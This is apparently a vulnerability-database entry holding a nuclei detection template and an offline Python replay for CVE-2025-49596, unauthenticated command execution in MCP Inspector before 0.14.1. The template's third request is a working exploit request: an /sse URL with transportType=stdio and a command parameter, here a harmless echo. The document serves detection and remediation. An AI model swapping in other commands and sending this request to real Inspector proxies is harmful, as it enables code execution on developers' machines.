MCP Inspector < 0.14.1 Unauthenticated Remote Code Execution

🗓️ 28 Jun 2026 15:08:32 · Reported by ProjectDiscovery · Type: nuclei · 🔗 github.com

Unauthenticated remote code execution in MCP Inspector before 0.14.1; upgrade to 0.14.1 or later.

id: CVE-2025-49596

info:
  name: MCP Inspector < 0.14.1 Unauthenticated Remote Code Execution
  author: ye11oc4t
  severity: critical
  description: |
    MCP Inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector before 0.14.1 (0.14.0 included) are vulnerable to remote code execution because there is no authentication between the Inspector client and its proxy: anyone who can reach the proxy's /sse endpoint can ask it to launch an arbitrary command over the stdio transport.
  impact: |
    An unauthenticated attacker who can reach the proxy (directly, or indirectly through a browser on the developer's machine) can execute arbitrary commands with the privileges of the user running the Inspector.
  remediation: Upgrade to MCP Inspector 0.14.1 or later, which adds authentication between the client and the proxy, and avoid exposing the proxy beyond localhost.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49596
    - https://github.com/modelcontextprotocol/inspector
    - https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979
    - https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g
    - https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
  classification:
    cve-id: CVE-2025-49596
    cwe-id: CWE-306
    epss-score: 0.3703
    epss-percentile: 0.9832
  metadata:
    verified: true
    fofa-query: title="MCP Inspector"
  tags: cve,cve2025,mcp,anthropic,unauth,passive,vkev,vuln,ai

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,"MCP Inspector")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: js
        group: 1
        part: body
        regex:
          - 'src="([^"]+\.js)"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}{{js}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - compare_versions(version, '< 0.14.1')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        part: body
        regex:
          - 'const\s+version\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+)'

  - method: GET
    path:
      - "{{BaseURL}}/sse?transportType=stdio&command=echo&args[]=hello-from-browser"

    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"endpoint","/message?sessionId=")
          - status_code == 200
        condition: and

    extractors:
      - type: regex
        name: session_id
        part: body
        group: 1
        regex:
          - '\/message\?sessionId=([a-z0-9-]+)' # Returns: Session ID as proof of execution
# digest: 4a0a0047304502204cf0444e29b34c26c43b906fdb06ad32b45c116565bde7c98dad37044a2c18e5022100dd1a861453d1ff77519062a293f252900e321736086515693b03837e364cf667:922c64590222798bb761d5b6d8e72950
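The template above runs three dependent requests: fingerprint the Inspector client page, pull the version constant out of its bundled script, and only then fire the benign stdio probe and read the session ID back as proof that the proxy spawned a command. The following is an added, offline walkthrough of that same logic in Python; it is not part of the nuclei template or of the Inspector project. The HTML, JavaScript and SSE bodies are constructed samples, not captured traffic, and the default proxy port 6277 in the usage call is an assumption. The version comparison is done on numeric tuples so that, unlike a plain string compare, `0.9.0` sorts below `0.14.1`, and the affected range follows the advisory (everything before 0.14.1, so 0.14.0 is flagged).

```python
"""Offline replay of the CVE-2025-49596 check done by the nuclei template.

Added example, not the template's or the Inspector project's own code.
All bodies below are constructed samples, not captured traffic.
"""
import re
from urllib.parse import urlencode

# Constructed stand-in for the Inspector client's index page (step 1).
INDEX_HTML = ('<!doctype html><html><head><title>MCP Inspector</title>'
              '<script type="module" src="/assets/index-abc123.js"></script>'
              '</head><body></body></html>')

# Constructed stand-in for the bundled client script (step 2); real bundles
# embed the package version as a string constant of this shape.
JS_BUNDLE = 'var x=1;const version="0.14.0";export default version;'

# Constructed stand-in for the proxy's SSE reply after it launched the
# stdio command (step 3). The endpoint event carries the session id.
SSE_BODY = ('event: endpoint\n'
            'data: /message?sessionId=6f1c2e8a-3b6d-4b1e-9d51-0a9f7c2d1e44\n\n')

JS_SRC_RE = re.compile(r'src="([^"]+\.js)"')
VERSION_RE = re.compile(r'const\s+version\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+)')
SESSION_RE = re.compile(r'/message\?sessionId=([a-z0-9-]+)')


def is_inspector(status, body):
    """Step 1: the page must return 200 and name itself 'MCP Inspector'."""
    return status == 200 and "MCP Inspector" in body


def extract_js_path(html):
    """First <script src> ending in .js; the template fetches {{BaseURL}}{{js}},
    so this only works for root-relative paths like the sample above."""
    m = JS_SRC_RE.search(html)
    return m.group(1) if m else None


def extract_version(js):
    m = VERSION_RE.search(js)
    return m.group(1) if m else None


def parse_version(v):
    return tuple(int(p) for p in v.split("."))


def is_vulnerable_version(v, fixed="0.14.1"):
    """Advisory range: every release before 0.14.1 is affected, 0.14.0 included."""
    return parse_version(v) < parse_version(fixed)


def build_probe_url(base, command="echo", args=("hello-from-browser",)):
    """Same benign probe the template sends: a harmless echo over stdio.
    urlencode writes args[] as args%5B%5D, which the proxy's query parser
    accepts just like the literal brackets in the template."""
    query = [("transportType", "stdio"), ("command", command)]
    query += [("args[]", a) for a in args]
    return f"{base.rstrip('/')}/sse?{urlencode(query)}"


def confirm_execution(status, body):
    """Step 3: a sessionId is only issued after the proxy spawned the command,
    so its presence is the proof of execution. Returns the id or None."""
    if status != 200 or "endpoint" not in body or "/message?sessionId=" not in body:
        return None
    m = SESSION_RE.search(body)
    return m.group(1) if m else None


def assess(index_status, index_html, js_status, js_body, sse_status, sse_body):
    """Run the three steps in order and short-circuit like the nuclei flow."""
    if not is_inspector(index_status, index_html):
        return {"fingerprinted": False}
    ver = extract_version(js_body) if js_status == 200 else None
    if ver is None or not is_vulnerable_version(ver):
        return {"fingerprinted": True, "version": ver, "vulnerable": False}
    sid = confirm_execution(sse_status, sse_body)
    return {"fingerprinted": True, "version": ver,
            "vulnerable": sid is not None, "session_id": sid}


if __name__ == "__main__":
    # Assumed default proxy port; adjust to the target's actual listener.
    print(build_probe_url("http://127.0.0.1:6277/"))
    print(assess(200, INDEX_HTML, 200, JS_BUNDLE, 200, SSE_BODY))
```

To test a live host, replace the constructed bodies with the responses of the three GETs in order and keep the probe command harmless; the session ID alone demonstrates that the proxy spawned a process, so nothing beyond `echo` is needed.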


Scores (as of 04 Feb 2026 07:00): Vulners AI Score 8.1 (High risk) · CVSS 4 9.4 · EPSS 0.3703